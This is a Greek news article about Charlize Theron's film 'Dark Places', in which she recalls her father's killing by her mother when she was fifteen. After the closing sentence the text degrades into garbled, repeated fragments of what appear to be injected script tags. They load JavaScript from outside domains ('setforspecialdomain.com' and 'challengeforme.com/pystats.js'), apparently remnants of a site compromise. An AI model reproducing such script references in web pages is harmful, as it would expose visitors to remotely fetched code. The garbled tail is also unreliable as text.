Σαρλίζ Θερόν: Πώς έζησα τη βία και τον φόνο στην οικογένεια

Με αφορμή τον τελευταίο ρόλο της, η Σαρλίζ Θερόν επανέρχεται στη σκοτεινή ιστορία που σκιάζει την εφηβεία της, όταν η μητέρα της δολοφόνησε τον πατέρα μπροστά της

sarliz-theron-pws-ezisa-ti-bia-kai-ton-fono-stin-oikogeneia

Στη νέα ταινία της, «Σκοτεινός τόπος», που μόλις έκανε πρεμιέρα στη Γαλλία υποδύεται τη Λίμπι Ντέι, μια σκοτεινή ηρωίδα που σε ηλικία οκτώ ετών είχε βιώσει μια ασύλληπτη τραγωδία: είχε επιβιώσει της αιματηρής σφαγής της οικογένειας της (μητέρας και δύο μικρών αδερφών) από το χέρι του έφηβου αδερφού της.

Η ταινία που βασίζεται στο ομώνυμο βιβλίο της Τζίλιαν Φλιν (το δεύτερο που γίνεται ταινία μετά «Το Κορίτσι που εξαφανίστηκε»), έδωσε στη Σαρλίζ Θερόν την ευκαιρία να παίξει ένα ρόλο που της θυμίζει τον εαυτό της. Γιατί και η ίδια σε πολύ νεαρή ηλικία είχε ζήσει τη βία αλλά και το φόνο μέσα στην οικογένεια.

Σε συνέντευξη στο τηλεοπτικό δίκτυο, TF1, η Θερόν μίλησε για τις ομοιότητες του ρόλου με την πραγματικότητα. «Καταλαβαίνω όσο καμία άλλη αυτή την ηρωίδα. Εζησε κάτι που έχω ζήσει κι εγώ στην προσωπική ζωή μου, μια εξαιρετικά τραυματική εμπειρία» τόνισε και συνέχισε: «Υπάρχει μια παρόμοια πορεία στην εξέλιξη της ζωής μου με τη δική της. Υπάρχουν πολλά κοινά στοιχεία, γιατί εγώ δεν φαντάζομαι μόνο πώς μεγαλώνει ένα παιδί ύστερα από μια δολοφονία στην οικογένεια, το έχω ζήσει…»

Η ιστορία, στην οποία η σήμερα 39χρονη σταρ αναφέρεται, αφορά την τραγωδία που βίωσε όταν ήταν 15 ετών και ο πατέρας της, Τσαρλς, ευρισκόμενος σε κατάσταση άγριας μέθης, απείλησε να πυροβολήσει την ίδια και τη μητέρα της, Γκέρντα. Σύμφωνα με την κατάθεση της Γκέρντα, κατάφερε να τον πυροβολήσει πρώτη -ευρισκόμενη σε αυτοάμυνα όπως δέχτηκε το δικαστήριο- και να τον σκοτώσει μπροστά στα μάτια της κόρης τους.

Η Θερόν είχε μιλήσει πρώτη φορά γι’ αυτό το 2004 σε συνέντευξη στο ABC, παραδεχόμενη πως της πήρε χρόνια για να συνειδητοποιήσει τι ακριβώς είχε συμβεί. «Δεν μπορούσα να το χωνέψω. Κανείς δεν μπορεί να πιστέψει πως τέτοια γεγονότα, θα μπορούσαν ποτέ να συμβούν στον ίδιο, πάντα νομίζεις πως αυτά συμβαίνουν στους άλλους. Τώρα πια το έχω συνειδητοποιήσει, είναι κομμάτι μου, όμως δεν είναι αυτό που καθορίζει εμένα ή τη ζωή μου…».

Μια ζωή που σήμερα κυλά αρμονικά στο πλευρό του Σον Πεν, μαζί με τον τρίχρονο υιοθετημένο γιο της, Τζάκσον.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >